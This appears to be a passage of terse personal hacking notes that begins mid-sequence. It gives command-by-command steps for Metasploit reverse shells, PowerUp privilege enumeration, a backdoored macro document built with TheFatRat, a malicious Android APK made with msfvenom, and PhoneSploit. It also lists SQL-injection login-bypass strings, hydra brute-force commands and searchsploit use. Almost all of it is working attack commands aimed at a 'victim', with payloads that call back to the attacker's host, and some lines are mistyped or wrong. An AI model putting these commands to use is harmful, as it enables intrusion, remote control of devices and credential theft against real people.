set LPORT my.port
exploit/run // run the exploit
//share the file with the victim
my.ip/share
//inside the victim's machine
run the exe // text.exe share with the server
//look at the metasploit session
sysinfo // system info

//now with try to enumerate to know misconfigurations on the w10 system
//using PowerSploit
upload /path/PowerUp.ps1 powerup.ps1 // with meterpreter
shell // with shell with change from meterpreter to windows shell
// now we execute powerup
powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"
// now we know that windows is vulnerable to dll injection
// change to meterpreter shell with exit & run
run vnc // will open a VNC remote control on the victim

// Now we will try another method to gain access to a machine
// with TheFatRat
chmod +x fatrat
chmod +x setup.sh
chmd +x powerfull.sh
./setup.sh
//run fatrat
option 6 // create fud.. [Excelent]
option 3 // create apache + ps1
//put the lhost and lport
enter the name for files : payload
option 3 // for choosing meterpreter/reverse_tcp
// payload generated
option 9 // back to the menu
option 7 // create a back office
option 2 // macro windows and select lhost and lport
// enter the name for the doc file
// use custom exe backdoor Y
option 3 // reverse_tcp 
// backdoor inside the doc generate

// share document with the server option 1 and 2 above
// start msfconsole to gain meterpreter shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST my.ip
set RHOST my.port
exploit / run 

Mobile Hacking

// create a backdoor with msfvenom
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=my.ip R > path/backdoor.apk
// share with some of the three methods above
// now with metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST my.ip
exploit -j -z // exploit with a background job
// install the apk in android & the session will open
sessions -i 1 // will display the meterpreter
sysinfo // to know the os

// Using PhoneSploit (SUPER IMPORTANTE)
run phonesploit
option 3 // new phone
enter the ip // ip' phone &
option 4 // to shell on the phone
//in the menu you can search, download, info

Using the methodology

1. netdiscover -i eth0
2. nmap -p- 10.10.10.10 [ Any IP ] port discovery
3. nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10
4. gobuster -e -u** http://10.10.10.10 -w wordlsit.txt on a webserver running
5. trying sqli payloads on the forms

admin' --  
admin' #  
admin'/*  
' or 1=1--  
' or 1=1#  
' or 1=1/*  
') or '1'='1--  
') or ('1'='1—

6. bruteforcing web servers

hydra -l root -P passwords.txt [-t 32] <IP> **_ftp_**
hydra -L usernames.txt -P pass.txt <IP> **_mysql_**
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> **_pop3_** -V
hydra -V -f -L <userslist> -P <passwlist> **_rdp_**://<IP>
hydra -P common-snmp-community-strings.txt target.com **_snmp_**
hydra -l Administrator -P words.txt 192.168.1.12 **_smb_** -t 1
hydra -l root -P passwords.txt <IP> **_ssh_**

7. cewl example.com -m 5 -w words.txt custom wordlist
8. search for vulns

searchsploit 'Linux Kernel'
searchsploit -m 7618 // Paste the exploit in the current directory
searchsploit -p 7618[.c] // Show complete path
searchsploit — nmap file.xml // Search vulns inside a Nmap XML result